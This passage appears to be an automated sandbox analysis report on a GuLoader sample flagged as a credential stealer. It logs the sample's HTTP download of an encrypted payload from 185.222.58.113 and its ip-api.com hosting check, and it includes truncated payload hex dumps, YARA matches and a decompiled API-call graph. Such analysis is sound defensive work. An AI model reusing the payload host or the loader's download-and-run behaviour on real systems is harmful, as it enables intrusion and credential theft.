                                          Jul 1, 2024 12:26:39.848577023 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848577976 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848603010 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848603010 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848670006 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848716021 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848716021 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848742008 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848742008 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848750114 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848752022 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848752975 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848752975 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848753929 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848754883 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848754883 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848756075 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848756075 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848757029 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848757029 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848757982 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848768950 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848782063 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848790884 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848792076 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:26:39.848840952 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848840952 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848840952 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848840952 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848840952 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848889112 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848889112 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848889112 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848889112 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848937988 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848937988 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848937988 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848937988 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848987103 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848987103 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.848987103 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:39.849083900 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:26:43.185652971 CEST4975880192.168.11.30208.95.112.1
                                          Jul 1, 2024 12:26:43.321563005 CEST8049758208.95.112.1192.168.11.30
                                          Jul 1, 2024 12:26:43.321700096 CEST4975880192.168.11.30208.95.112.1
                                          Jul 1, 2024 12:26:43.321989059 CEST4975880192.168.11.30208.95.112.1
                                          Jul 1, 2024 12:26:43.458991051 CEST8049758208.95.112.1192.168.11.30
                                          Jul 1, 2024 12:26:43.510294914 CEST4975880192.168.11.30208.95.112.1
                                          Jul 1, 2024 12:27:49.609431028 CEST8049758208.95.112.1192.168.11.30
                                          Jul 1, 2024 12:27:49.609672070 CEST4975880192.168.11.30208.95.112.1
                                          Jul 1, 2024 12:28:23.472677946 CEST4975880192.168.11.30208.95.112.1
                                          Jul 1, 2024 12:28:23.609031916 CEST8049758208.95.112.1192.168.11.30
                                          Jul 1, 2024 12:28:28.252629042 CEST4975580192.168.11.30185.222.58.113
                                          Jul 1, 2024 12:28:28.487276077 CEST8049755185.222.58.113192.168.11.30
                                          Jul 1, 2024 12:28:28.487546921 CEST4975580192.168.11.30185.222.58.113
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 1, 2024 12:26:43.033962011 CEST5023853192.168.11.301.1.1.1
                                          Jul 1, 2024 12:26:43.153511047 CEST53502381.1.1.1192.168.11.30
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 1, 2024 12:26:43.033962011 CEST192.168.11.301.1.1.10xc075Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 1, 2024 12:26:43.153511047 CEST1.1.1.1192.168.11.300xc075No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                          • 185.222.58.113
                                          • ip-api.com
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.11.3049755185.222.58.113809904C:\Users\user\Desktop\004552024107.bat.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 12:26:38.508272886 CEST174OUTGET /ubsFsaZf137.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: 185.222.58.113
                                          Cache-Control: no-cache
                                          Jul 1, 2024 12:26:38.730926037 CEST1289INHTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Mon, 01 Jul 2024 02:08:03 GMT
                                          Accept-Ranges: bytes
                                          ETag: "d5f07b815bcbda1:0"
                                          Server: Microsoft-IIS/8.5
                                          Date: Mon, 01 Jul 2024 10:26:37 GMT
                                          Content-Length: 242240
                                          Data Raw: c2 df 50 21 16 9b 42 88 5c e8 1b 23 af b5 45 03 f1 8e 32 bf 73 2c a5 31 93 f3 c8 66 ec 22 da 49 7c a6 0b 25 bb 28 11 08 9c 61 11 98 86 f0 fe d3 26 e0 60 b4 38 b1 b6 bf cd bd 2f 3b e6 13 53 a6 24 48 24 26 84 15 e0 e5 29 ab 31 f2 85 f8 ca 59 3c 7d a6 b4 cb ed d3 07 d6 0f e8 da 11 b8 1f be b8 49 7f 17 ef 25 de c1 14 24 cc 00 cb 17 24 ef 3d 1c 5a fb 49 c9 e6 00 34 a5 37 73 a8 a0 3d 3e 28 d6 a7 bc f0 96 3d 4c 9a 95 e8 fb dc 48 c7 94 9d d1 4e 7f 7e d7 56 dd 92 a9 a7 e0 38 04 8f f4 da 52 3d f8 34 5c 30 d3 b0 d2 d1 ce 51 a8 f2 01 0b c0 fa b8 13 91 f5 d2 7a 43 88 3f 81 06 3f 9c ea e1 dc 87 bd 43 84 94 ba b8 0d 0b 17 b9 f3 7c 0a e5 a4 65 e1 e1 81 1e 4f d8 e2 bc c2 90 b5 67 d4 b3 55 58 3f 5c 70 99 bc 7c f3 eb 46 96 4e 23 e2 b9 6d ba 8c 10 ad 7f d2 4e 46 a5 17 ad 38 41 65 1a c9 2f 90 80 6a 75 f4 ad 64 d0 ac 78 36 d8 cf 37 ec 2a f8 ee b1 97 04 be 0d cb 1b 07 d2 9b 31 6c 08 22 85 b2 d2 fa 84 3f db 96 20 a6 90 68 f6 66 61 01 01 49 1c 20 b6 5a 7c 50 47 c8 58 35 d7 cd ab 84 ad 52 66 17 f5 74 a8 f3 d7 99 ff d6 f2 11 [TRUNCATED]
                                          Data Ascii: P!B\#E2s,1f"I|%(a&`8/;S$H$&)1Y<}I%$$=ZI47s=>(=LHN~V8R=4\0QzC??C|eOgUX?\p|FN#mNF8Ae/judx67*1l"? hfaI Z|PGX5Rft ]aC{qZyxh^ 9.kn(I#rmv]ABwUeqhE?cyOL71wAW zEg"n+FE7.mMi!2))Z(QD! zai:QF^KQT2Jf2Vc[+D~'@`.h$6'kBUZ|m5{r8SxqESS\'I:^6"7;`AIcn4Uec,ch]Bs"\,W}9.+qAwkn5$L+q}es=!SJo~Vw!^DJ$nf5oOF$m\kb'O*I}@!Uchb;[<(uP(b,O_==2w;A@BG^3V<Axdi( _SU!:1]k/VpDmudpA-0A [TRUNCATED]
                                          Jul 1, 2024 12:26:38.730941057 CEST1289INData Raw: 2e 1b f6 6f 99 bc 93 8b 07 bc 52 e8 22 50 b7 91 90 98 55 df 78 5c e7 72 2a ec 13 13 a9 6c d3 d1 fd 69 84 44 3f 24 58 d4 f2 3e 47 00 24 96 ed e1 96 04 e2 4e 58 55 75 35 0a 2f 76 f0 f9 88 b0 cd a0 d6 51 a8 fa 77 47 92 73 ad 3f 45 a6 71 f4 13 de 2e
                                          Data Ascii: .oR"PUx\r*liD?$X>G$NXUu5/vQwGs?Eq.?"C)0z,}YXsal/"W=\(5_=:U4win'Qys rU.AA,=^A`>DV_GzH}OeD:
                                          Jul 1, 2024 12:26:38.731026888 CEST1289INData Raw: f3 7c 0e cf 86 67 02 9c 19 1f 44 dd c3 f6 c0 10 a5 67 d4 b1 57 2a a0 79 70 e9 3a 45 f0 eb 40 9c 50 21 99 c2 6e ba 88 3a cf 7d d1 13 dd a5 17 ab 12 0b 63 32 da 2f 90 8a 68 07 49 84 64 a0 84 7c 37 d8 c9 3d f6 28 83 70 b1 97 00 94 2f c9 1a 7a 0e 1e
                                          Data Ascii: |gDgW*yp:E@P!n:}c2/hId|7=(p/z1h2h5n`c"|PCz7v5VL]< -lCes!jyR2gvh^K=kd;IXvOts]Bw_fhe'cM7/3]RWGp5
                                          Jul 1, 2024 12:26:38.731041908 CEST1289INData Raw: e7 0c bc d8 5d f5 be cc 3c b2 b3 9d 41 28 74 9a 88 a3 d3 ba c9 be 00 4c ae 56 06 1a a8 d8 ac e8 be 3d a2 37 2e b3 9f 4f ff a1 d0 e1 9c 4d 4d a4 12 b6 b4 bb d3 6a db 39 10 e1 6c 51 f8 5a 28 05 a7 0b d3 c8 10 89 16 1c 37 d8 53 1b 8a 5e 44 fc 9d 0b
                                          Data Ascii: ]<A(tLV=7.OMMj9lQZ(7S^D`zeg\F2`&ZKUPv&T6Abm\Z+Fs'Gh,j&4!7h@Uk/N1YYsMzSEW]B%hjdE'n
                                          Jul 1, 2024 12:26:38.953243971 CEST1289INData Raw: 49 95 b0 bf 92 48 73 8f e9 3a c5 8b 41 f2 b1 24 46 ce d1 32 b4 d7 87 4e 19 e8 7e 84 54 0a d3 22 bd 0d fe 85 92 8b 5f 8c 01 91 eb 9d 27 3e d0 a7 7d 17 c2 15 c9 1b 2c 52 51 2d 91 d8 b3 4a db 57 9d 35 72 04 38 ed 8c 2c 8f 99 13 ce 15 00 4f 1f 8a 46
                                          Data Ascii: IHs:A$F2N~T"_'>},RQ-JW5r8,OFf)Bx;l;nFHG{}9<+'(X<ce7f^J=zDL_]_e-cC+7- `vp1!<3(x~yg(JO#?=
                                          Jul 1, 2024 12:26:38.953291893 CEST1289INData Raw: 28 6c 93 de 80 55 67 28 62 fa 7b 98 81 fa 42 9f c3 aa 8a 7f 12 ec ae 77 c6 c9 bd a7 08 88 55 b9 6d 7d 42 0f 3b 40 e0 d5 fa ea 77 a7 d1 78 86 9f 5c 90 23 ad a4 0b 52 e2 d6 2a 96 d6 6a a4 7b 93 21 bf 69 0d 22 43 39 d8 e0 7b b2 45 69 7e 6b e2 d6 11
                                          Data Ascii: (lUg(b{BwUm}B;@wx\#R*j{!i"C9{Ei~kUZ@so*1s<Z/n2Qm%TtW}ITJMt,+[iAvox<=;"=;;0\Rf2q<YsL(iO[ic>/vQ.s
                                          Jul 1, 2024 12:26:38.953327894 CEST1289INData Raw: 3d 22 2d 76 f0 f9 68 bc e6 b3 d6 af ae d3 f5 18 c3 73 ad 3b 45 b2 58 ec 13 dc 51 97 1e b5 26 a7 10 e0 e5 2d 83 1f f2 7a 0d 68 79 8c 7d a6 b4 35 e3 d0 07 96 f1 e4 d9 11 98 13 be b8 49 81 16 d6 3d de c1 14 da c0 01 cb 37 2e ef 3d 1c 28 f0 4b c9 96
                                          Data Ascii: ="-vhs;EXQ&-zhy}5I=7.=(K7s(^3=&"-IP@hRZ.v^C?ba|ed^UXPq2FHG#NmF;AA/~kLdRt7*
                                          Jul 1, 2024 12:26:38.953360081 CEST1289INData Raw: 84 68 75 f6 2d 63 d0 ac 7c 16 d0 cf 17 e8 d4 f6 ec b1 97 fa b2 0d cb 39 07 92 1e 31 92 19 1b 8f a2 d2 fa 84 1f ca 96 20 b6 6e 66 f6 66 61 ff 1d 49 1c 00 be 5a 7c 50 b9 c9 61 30 8b 0b a8 bc e7 52 66 17 cd 35 55 0c 6e b6 ff d6 f1 21 21 5d b5 60 f7
                                          Data Ascii: hu-c|91 nffaIZ|Pa0Rf5Un!!]`C{q({xdP9.=p,c$ov&8]:I0$WAI@cy(ZL51`WASGE NFAE{Fj;o&J(g>,
                                          Jul 1, 2024 12:26:38.953419924 CEST1289INData Raw: 13 32 e9 91 22 10 5a 08 23 8d 15 d1 4d f7 85 16 18 e3 f6 5d 18 d7 b3 44 fc 99 df 93 ce a7 e9 60 7a 9f 23 e3 65 77 4e ac 32 db fb 5a 18 ad 06 b0 41 72 74 51 e6 5e f5 d2 50 e3 12 d0 9f b3 a4 11 44 87 7f 66 0a c9 3e 16 f5 0e 21 ea 5b d5 b9 7d c9 88
                                          Data Ascii: 2"Z#M]D`z#ewN2ZArtQ^PDf>![}~ HC(j8jClpme=[8SqcES'IH1AfF2n~"Z9Y3~bW'JQ$R6
                                          Jul 1, 2024 12:26:38.953576088 CEST1289INData Raw: 6c 57 2d 61 26 bf 4a d9 77 9c 24 52 04 c6 ec b5 c1 81 9b 13 de e3 00 4f 19 b3 a2 fb 64 0f d1 2a 84 ab 42 c5 95 25 8c 0c 20 af 2d 71 fa 84 c0 03 a6 e5 30 75 04 3b ed f8 cb dc ef 46 4f 80 aa e8 05 7a 51 c9 87 b0 ad 13 cd 9c b0 3d 2b d9 ab 8a 67 54
                                          Data Ascii: lW-a&Jw$ROd*B% -q0u;FOzQ=+gT=c6oJ;+zn@_X_7e-U;C7t 2!cch,<$ <(^BO2=&w('m<6xwYxYZk*ZwjA
                                          Jul 1, 2024 12:26:38.953615904 CEST1289INData Raw: 94 c7 2a 68 aa cc 5a 57 9a 21 9f 6a f3 23 7a 14 cf e0 7b 80 be 67 7b 6b 24 26 e9 53 92 e4 8c 54 79 93 43 a6 f0 4a 64 1a 71 04 ed 1a 19 6e 2a 15 86 52 73 20 ea 75 3c ce 73 f2 b4 66 03 9f 88 58 ac 27 b1 c5 0f 21 92 6e 50 e4 90 40 47 05 55 7f 74 40
                                          Data Ascii: *hZW!j#z{g{k$&STyCJdqn*Rs u<sfX'!nP@GUt@E@.GTJMu'=.|T<R037R^`k]Fv%[Qy*vKMT8yS5#VM'z};wU8I%$o$


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.11.3049758208.95.112.1809904C:\Users\user\Desktop\004552024107.bat.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 12:26:43.321989059 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                          Host: ip-api.com
                                          Connection: Keep-Alive
                                          Jul 1, 2024 12:26:43.458991051 CEST174INHTTP/1.1 200 OK
                                          Date: Mon, 01 Jul 2024 10:26:42 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 5
                                          Access-Control-Allow-Origin: *
                                          X-Ttl: 60
                                          X-Rl: 44
                                          Data Raw: 74 72 75 65 0a
                                          Data Ascii: true


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:06:26:18
                                          Start date:01/07/2024
                                          Path:C:\Users\user\Desktop\004552024107.bat.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\004552024107.bat.exe"
                                          Imagebase:0x400000
                                          File size:509'934 bytes
                                          MD5 hash:610C22DFF8F1F7D12746E879BE25D778
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1249582917.0000000005B81000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:06:26:29
                                          Start date:01/07/2024
                                          Path:C:\Users\user\Desktop\004552024107.bat.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\004552024107.bat.exe"
                                          Imagebase:0x400000
                                          File size:509'934 bytes
                                          MD5 hash:610C22DFF8F1F7D12746E879BE25D778
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.6168473251.0000000034445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:22%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:16.2%
                                            Total number of Nodes:1557
                                            Total number of Limit Nodes:41
                                            execution_graph 3915 4015c2 3919 402c5e 3915->3919 3918 4015db 3920 402c6a 3919->3920 3925 406320 3920->3925 3923 4015c9 SetFileAttributesA 3923->3918 3933 40632d 3925->3933 3926 40656e 3927 402c8b 3926->3927 3964 40628d lstrcpynA 3926->3964 3927->3923 3942 406587 3927->3942 3929 406545 lstrlenA 3929->3933 3932 406320 15 API calls 3932->3929 3933->3926 3933->3929 3933->3932 3935 40644c GetSystemDirectoryA 3933->3935 3936 406462 GetWindowsDirectoryA 3933->3936 3937 406587 5 API calls 3933->3937 3938 406320 15 API calls 3933->3938 3939 4064ee lstrcatA 3933->3939 3941 4064c5 SHGetPathFromIDListA CoTaskMemFree 3933->3941 3951 406174 3933->3951 3956 4066b5 GetModuleHandleA 3933->3956 3962 4061eb wsprintfA 3933->3962 3963 40628d lstrcpynA 3933->3963 3935->3933 3936->3933 3937->3933 3938->3933 3939->3933 3941->3933 3949 406593 3942->3949 3943 4065ff CharPrevA 3945 4065fb 3943->3945 3944 4065f0 CharNextA 3944->3945 3944->3949 3945->3943 3946 40661a 3945->3946 3946->3923 3948 4065de CharNextA 3948->3949 3949->3944 3949->3945 3949->3948 3950 4065eb CharNextA 3949->3950 3972 405c4a 3949->3972 3950->3944 3965 406113 3951->3965 3954 4061d7 3954->3933 3955 4061a8 RegQueryValueExA RegCloseKey 3955->3954 3957 4066d1 3956->3957 3958 4066db GetProcAddress 3956->3958 3969 406647 GetSystemDirectoryA 3957->3969 3959 4066ea 3958->3959 3959->3933 3961 4066d7 3961->3958 3961->3959 3962->3933 3963->3933 3964->3927 3966 406122 3965->3966 3967 406126 3966->3967 3968 40612b RegOpenKeyExA 3966->3968 3967->3954 3967->3955 3968->3967 3970 406669 wsprintfA LoadLibraryExA 3969->3970 3970->3961 3973 405c50 3972->3973 3974 405c63 3973->3974 3975 405c56 CharNextA 3973->3975 3974->3949 3975->3973 3976 401a43 3977 402c5e 21 API calls 3976->3977 3978 401a4c ExpandEnvironmentStringsA 3977->3978 3979 401a60 3978->3979 3981 401a73 3978->3981 3980 401a65 lstrcmpA 3979->3980 3979->3981 3980->3981 3982 402543 3993 402c9e 3982->3993 3985 402c5e 21 API calls 3986 402556 3985->3986 3987 402560 RegQueryValueExA 3986->3987 3991 4027ed 3986->3991 3988 402580 3987->3988 3989 402586 RegCloseKey 3987->3989 3988->3989 3998 4061eb wsprintfA 3988->3998 3989->3991 3994 402c5e 21 API calls 3993->3994 3995 402cb5 3994->3995 3996 406113 RegOpenKeyExA 3995->3996 3997 40254d 3996->3997 3997->3985 3998->3989 5042 401744 5043 402c5e 21 API calls 5042->5043 5044 40174b SearchPathA 5043->5044 5045 401766 5044->5045 5046 401d44 5047 402c3c 21 API calls 5046->5047 5048 401d4b 5047->5048 5049 402c3c 21 API calls 5048->5049 5050 401d57 GetDlgItem 5049->5050 5051 40264d 5050->5051 5052 402ac5 SendMessageA 5053 402adf InvalidateRect 5052->5053 5054 402aea 5052->5054 5053->5054 3999 4023c9 4000 4023d1 3999->4000 4001 4023d7 3999->4001 4002 402c5e 21 API calls 4000->4002 4003 402c5e 21 API calls 4001->4003 4004 4023e7 4001->4004 4002->4001 4003->4004 4005 402c5e 21 API calls 4004->4005 4007 4023f5 4004->4007 4005->4007 4006 402c5e 21 API calls 4008 4023fe WritePrivateProfileStringA 4006->4008 4007->4006 4009 4020ca 4010 4020dc 4009->4010 4020 40218a 4009->4020 4011 402c5e 21 API calls 4010->4011 4012 4020e3 4011->4012 4014 402c5e 21 API calls 4012->4014 4013 401423 28 API calls 4015 40230f 4013->4015 4016 4020ec 4014->4016 4017 402101 LoadLibraryExA 4016->4017 4018 4020f4 GetModuleHandleA 4016->4018 4019 402111 GetProcAddress 4017->4019 4017->4020 4018->4017 4018->4019 4021 402120 4019->4021 4022 40215d 4019->4022 4020->4013 4024 402128 4021->4024 4025 40213f 4021->4025 4075 4053d1 4022->4075 4072 401423 4024->4072 4030 6d0e176b 4025->4030 4026 402130 4026->4015 4028 40217e FreeLibrary 4026->4028 4028->4015 4031 6d0e179b 4030->4031 4086 6d0e1b28 4031->4086 4033 6d0e17a2 4034 6d0e18c4 4033->4034 4035 6d0e17ba 4033->4035 4036 6d0e17b3 4033->4036 4034->4026 4120 6d0e2381 4035->4120 4136 6d0e233f 4036->4136 4041 6d0e181e 4047 6d0e186c 4041->4047 4048 6d0e1824 4041->4048 4042 6d0e1800 4149 6d0e2568 4042->4149 4043 6d0e17e9 4057 6d0e17df 4043->4057 4146 6d0e2d53 4043->4146 4044 6d0e17d0 4046 6d0e17d6 4044->4046 4052 6d0e17e1 4044->4052 4046->4057 4130 6d0e2ac8 4046->4130 4050 6d0e2568 11 API calls 4047->4050 4168 6d0e15fb 4048->4168 4055 6d0e185d 4050->4055 4051 6d0e1806 4160 6d0e15e9 4051->4160 4140 6d0e2742 4052->4140 4071 6d0e18b3 4055->4071 4174 6d0e252e 4055->4174 4057->4041 4057->4042 4060 6d0e2568 11 API calls 4060->4055 4062 6d0e17e7 4062->4057 4064 6d0e18bd GlobalFree 4064->4034 4068 6d0e189f 4068->4071 4178 6d0e1572 wsprintfA 4068->4178 4069 6d0e1898 FreeLibrary 4069->4068 4071->4034 4071->4064 4073 4053d1 28 API calls 4072->4073 4074 401431 4073->4074 4074->4026 4076 4053ec 4075->4076 4085 40548f 4075->4085 4077 405409 lstrlenA 4076->4077 4078 406320 21 API calls 4076->4078 4079 405432 4077->4079 4080 405417 lstrlenA 4077->4080 4078->4077 4082 405445 4079->4082 4083 405438 SetWindowTextA 4079->4083 4081 405429 lstrcatA 4080->4081 4080->4085 4081->4079 4084 40544b SendMessageA SendMessageA SendMessageA 4082->4084 4082->4085 4083->4082 4084->4085 4085->4026 4181 6d0e12a5 GlobalAlloc 4086->4181 4088 6d0e1b4f 4182 6d0e12a5 GlobalAlloc 4088->4182 4090 6d0e1d90 GlobalFree GlobalFree GlobalFree 4091 6d0e1dad 4090->4091 4102 6d0e1df7 4090->4102 4093 6d0e2181 4091->4093 4099 6d0e1dc2 4091->4099 4091->4102 4092 6d0e1c4d GlobalAlloc 4112 6d0e1b5a 4092->4112 4094 6d0e21a3 GetModuleHandleA 4093->4094 4093->4102 4095 6d0e21c9 4094->4095 4096 6d0e21b4 LoadLibraryA 4094->4096 4189 6d0e1652 GetProcAddress 4095->4189 4096->4095 4096->4102 4097 6d0e1c98 lstrcpyA 4101 6d0e1ca2 lstrcpyA 4097->4101 4098 6d0e1cb6 GlobalFree 4098->4112 4099->4102 4185 6d0e12b4 4099->4185 4101->4112 4102->4033 4103 6d0e221a 4103->4102 4107 6d0e2227 lstrlenA 4103->4107 4104 6d0e2047 4188 6d0e12a5 GlobalAlloc 4104->4188 4190 6d0e1652 GetProcAddress 4107->4190 4108 6d0e1f89 GlobalFree 4108->4112 4109 6d0e20c3 4109->4102 4117 6d0e211c lstrcpyA 4109->4117 4110 6d0e21db 4110->4103 4118 6d0e2204 GetProcAddress 4110->4118 4112->4090 4112->4092 4112->4097 4112->4098 4112->4101 4112->4102 4112->4104 4112->4108 4112->4109 4113 6d0e1cf4 4112->4113 4115 6d0e12b4 2 API calls 4112->4115 4113->4112 4183 6d0e15c4 GlobalSize GlobalAlloc 4113->4183 4114 6d0e2240 4114->4102 4115->4112 4117->4102 4118->4103 4119 6d0e204f 4119->4033 4128 6d0e239a 4120->4128 4122 6d0e24d6 GlobalFree 4123 6d0e17c0 4122->4123 4122->4128 4123->4043 4123->4044 4123->4057 4124 6d0e2448 GlobalAlloc MultiByteToWideChar 4126 6d0e2474 GlobalAlloc CLSIDFromString GlobalFree 4124->4126 4127 6d0e2495 4124->4127 4125 6d0e12b4 GlobalAlloc lstrcpynA 4125->4128 4126->4122 4127->4122 4196 6d0e26d6 4127->4196 4128->4122 4128->4124 4128->4125 4128->4127 4192 6d0e133d 4128->4192 4132 6d0e2ada 4130->4132 4131 6d0e2b7f EnumWindows 4135 6d0e2b9d 4131->4135 4132->4131 4134 6d0e2c69 4134->4057 4199 6d0e2a74 4135->4199 4137 6d0e2354 4136->4137 4138 6d0e235f GlobalAlloc 4137->4138 4139 6d0e17b9 4137->4139 4138->4137 4139->4035 4144 6d0e2772 4140->4144 4141 6d0e280d GlobalAlloc 4145 6d0e2830 4141->4145 4142 6d0e2820 4143 6d0e2826 GlobalSize 4142->4143 4142->4145 4143->4145 4144->4141 4144->4142 4145->4062 4147 6d0e2d5e 4146->4147 4148 6d0e2d9e GlobalFree 4147->4148 4203 6d0e12a5 GlobalAlloc 4149->4203 4151 6d0e2628 WideCharToMultiByte 4157 6d0e2574 4151->4157 4152 6d0e2604 StringFromGUID2 WideCharToMultiByte 4152->4157 4153 6d0e25f3 lstrcpynA 4153->4157 4154 6d0e2649 wsprintfA 4154->4157 4155 6d0e266d GlobalFree 4155->4157 4156 6d0e26a7 GlobalFree 4156->4051 4157->4151 4157->4152 4157->4153 4157->4154 4157->4155 4157->4156 4158 6d0e12f6 2 API calls 4157->4158 4204 6d0e1361 4157->4204 4158->4157 4208 6d0e12a5 GlobalAlloc 4160->4208 4162 6d0e15ee 4163 6d0e15fb 2 API calls 4162->4163 4164 6d0e15f8 4163->4164 4165 6d0e12f6 4164->4165 4166 6d0e12ff GlobalAlloc lstrcpynA 4165->4166 4167 6d0e1338 GlobalFree 4165->4167 4166->4167 4167->4055 4169 6d0e1607 wsprintfA 4168->4169 4170 6d0e1634 lstrcpyA 4168->4170 4173 6d0e164d 4169->4173 4170->4173 4173->4060 4175 6d0e253c 4174->4175 4176 6d0e187f 4174->4176 4175->4176 4177 6d0e2555 GlobalFree 4175->4177 4176->4068 4176->4069 4177->4175 4179 6d0e12f6 2 API calls 4178->4179 4180 6d0e1593 4179->4180 4180->4071 4181->4088 4182->4112 4184 6d0e15e2 4183->4184 4184->4113 4191 6d0e12a5 GlobalAlloc 4185->4191 4187 6d0e12c3 lstrcpynA 4187->4102 4188->4119 4189->4110 4190->4114 4191->4187 4193 6d0e1344 4192->4193 4194 6d0e12b4 2 API calls 4193->4194 4195 6d0e135f 4194->4195 4195->4128 4197 6d0e273a 4196->4197 4198 6d0e26e4 VirtualAlloc 4196->4198 4197->4127 4198->4197 4200 6d0e2a7f 4199->4200 4201 6d0e2a8f 4200->4201 4202 6d0e2a84 GetLastError 4200->4202 4201->4134 4202->4201 4203->4157 4205 6d0e136a 4204->4205 4206 6d0e1389 4204->4206 4205->4206 4207 6d0e1370 lstrcpyA 4205->4207 4206->4157 4207->4206 4208->4162 5055 402e4a 5056 402e72 5055->5056 5057 402e59 SetTimer 5055->5057 5058 402ec7 5056->5058 5059 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5056->5059 5057->5056 5059->5058 4216 40244e 4217 402480 4216->4217 4218 402455 4216->4218 4219 402c5e 21 API calls 4217->4219 4220 402c9e 21 API calls 4218->4220 4221 402487 4219->4221 4222 40245c 4220->4222 4228 402d1c 4221->4228 4223 402466 4222->4223 4226 402494 4222->4226 4225 402c5e 21 API calls 4223->4225 4227 40246d RegDeleteValueA RegCloseKey 4225->4227 4227->4226 4229 402d2f 4228->4229 4230 402d28 4228->4230 4229->4230 4232 402d60 4229->4232 4230->4226 4233 406113 RegOpenKeyExA 4232->4233 4234 402d8e 4233->4234 4235 402e43 4234->4235 4236 402d98 4234->4236 4235->4230 4237 402d9e RegEnumValueA 4236->4237 4246 402dc1 4236->4246 4238 402e28 RegCloseKey 4237->4238 4237->4246 4238->4235 4239 402dfd RegEnumKeyA 4240 402e06 RegCloseKey 4239->4240 4239->4246 4241 4066b5 5 API calls 4240->4241 4243 402e16 4241->4243 4242 402d60 6 API calls 4242->4246 4244 402e38 4243->4244 4245 402e1a RegDeleteKeyA 4243->4245 4244->4235 4245->4235 4246->4238 4246->4239 4246->4240 4246->4242 5063 6d0e1000 5066 6d0e101b 5063->5066 5073 6d0e154b 5066->5073 5068 